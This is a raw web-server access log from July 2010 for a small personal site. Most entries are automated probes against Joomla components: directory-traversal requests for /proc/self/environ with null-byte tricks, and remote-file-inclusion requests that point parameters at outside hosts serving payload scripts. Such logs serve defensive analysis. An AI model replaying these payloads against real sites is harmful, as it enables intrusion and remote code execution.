87.106.247.246 - - [09/Jul/2010:12:30:47 -0500] "GET /logs/access_log.1277078400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
87.106.247.246 - - [09/Jul/2010:12:30:47 -0500] "GET /logs/access_log.1277078400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
85.214.85.210 - - [09/Jul/2010:12:31:38 -0500] "GET /logs/access_log.1277510400//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 312 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:31:38 -0500] "GET //?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:31:38 -0500] "GET /logs//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 200 12642 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:32:13 -0500] "GET //?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:32:13 -0500] "GET /logs/access_log.1277510400//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 312 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:32:13 -0500] "GET /logs//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 200 12642 "-""kmccrew Bot Search"
87.229.26.132 - - [09/Jul/2010:12:32:27 -0500] "GET /logs/access_log.1276214400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:12:32:27 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:12:32:27 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:12:33:22 -0500] "GET /logs/access_log.1276214400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:12:33:23 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:12:33:23 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
85.214.85.210 - - [09/Jul/2010:12:33:42 -0500] "GET /logs/access_log.1277510400%20%20//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 314 "-""kmccrew Bot Search"
85.214.85.210 - - [09/Jul/2010:12:34:19 -0500] "GET /logs/access_log.1277510400%20%20//?option=com_ckforms&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 314 "-""kmccrew Bot Search"
67.195.112.232 - - [09/Jul/2010:12:36:14 -0500] "GET /logs/access_log.1273968000 HTTP/1.0" 200 528722 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.88.216.104 - - [09/Jul/2010:12:36:45 -0500] "GET / HTTP/1.1" 200 1003 "-""-"
81.93.240.199 - - [09/Jul/2010:12:43:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:43:11 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:43:29 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:44:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.249.71.179 - - [09/Jul/2010:12:44:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.179 - - [09/Jul/2010:12:44:42 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.232 - - [09/Jul/2010:12:44:51 -0500] "GET /logs/access_log.1212537600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [09/Jul/2010:12:46:38 -0500] "GET //linkadmin.php?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [09/Jul/2010:12:46:39 -0500] "GET /logs/access_log.1276905600%20%20//linkadmin.php?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.236.47.182 - - [09/Jul/2010:12:46:39 -0500] "GET /logs//linkadmin.php?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [09/Jul/2010:12:46:46 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.2.105.202 - - [09/Jul/2010:12:47:04 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:47:04 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:47:12 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:47:50 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
81.93.240.199 - - [09/Jul/2010:12:47:50 -0500] "GET /logs/access_log.1276905600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:47:50 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:47:50 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:48:13 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:48:13 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:48:26 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:48:26 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:48:26 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:48:41 -0500] "GET /logs/access_log.1276905600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:48:41 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:48:41 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:48:46 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:48:46 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:49:05 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:49:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:49:13 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.199 - - [09/Jul/2010:12:49:13 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:04 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:04 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:04 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:14 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:14 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:14 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.134 - - [09/Jul/2010:12:50:14 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.2.105.202 - - [09/Jul/2010:12:52:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:52:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:52:12 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
207.46.13.40 - - [09/Jul/2010:12:55:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.40 - - [09/Jul/2010:12:56:08 -0500] "GET /logs/access_log.1262908800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.237 - - [09/Jul/2010:12:59:04 -0500] "GET /logs/access_log.1177027200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.2.105.202 - - [09/Jul/2010:12:59:44 -0500] "GET /logs/access_log.1276905600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:59:45 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:59:45 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:59:48 -0500] "GET /logs/access_log.1276905600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:59:49 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:12:59:49 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:00 -0500] "GET /logs/access_log.1276905600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:05 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:06 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:19 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:19 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:00:20 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:01:51 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:01:52 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:01:53 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:01:54 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:02:08 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:02:08 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:03:50 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:03:51 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:03:57 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:03:57 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:04:25 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:04:25 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
218.150.85.170 - - [09/Jul/2010:13:04:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
66.249.71.179 - - [09/Jul/2010:13:07:43 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
65.55.2.141 - - [09/Jul/2010:13:07:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.232 - - [09/Jul/2010:13:07:59 -0500] "GET /logs/access_log.1175472000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.111.7.188 - - [09/Jul/2010:13:09:04 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:09:08 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
118.69.206.77 - - [09/Jul/2010:13:10:00 -0500] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
218.150.85.170 - - [09/Jul/2010:13:11:57 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jul/2010:13:11:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jul/2010:13:11:58 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jul/2010:13:13:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
66.249.71.179 - - [09/Jul/2010:13:13:59 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
62.2.105.202 - - [09/Jul/2010:13:14:10 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:11 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:11 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:12 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:16 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:16 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:17 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:14:18 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
207.46.199.184 - - [09/Jul/2010:13:14:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.69.206.77 - - [09/Jul/2010:13:14:47 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.232 - - [09/Jul/2010:13:15:15 -0500] "GET /logs/access_log.1190419200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.111.7.188 - - [09/Jul/2010:13:15:24 -0500] "GET /logs/access_log.1275782400/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:25 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:25 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:26 -0500] "GET /logs/access_log.1275609600/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:15:33 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:15:34 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:15:34 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:15:35 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:36 -0500] "GET /logs/access_log.1275782400/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:37 -0500] "GET /index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:37 -0500] "GET /logs/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:15:38 -0500] "GET /logs/access_log.1275609600/index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
118.69.206.77 - - [09/Jul/2010:13:15:43 -0500] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
66.249.71.179 - - [09/Jul/2010:13:20:15 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "-""Googlebot-Image/1.0"
91.177.225.55 - - [09/Jul/2010:13:22:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:38 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:42 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
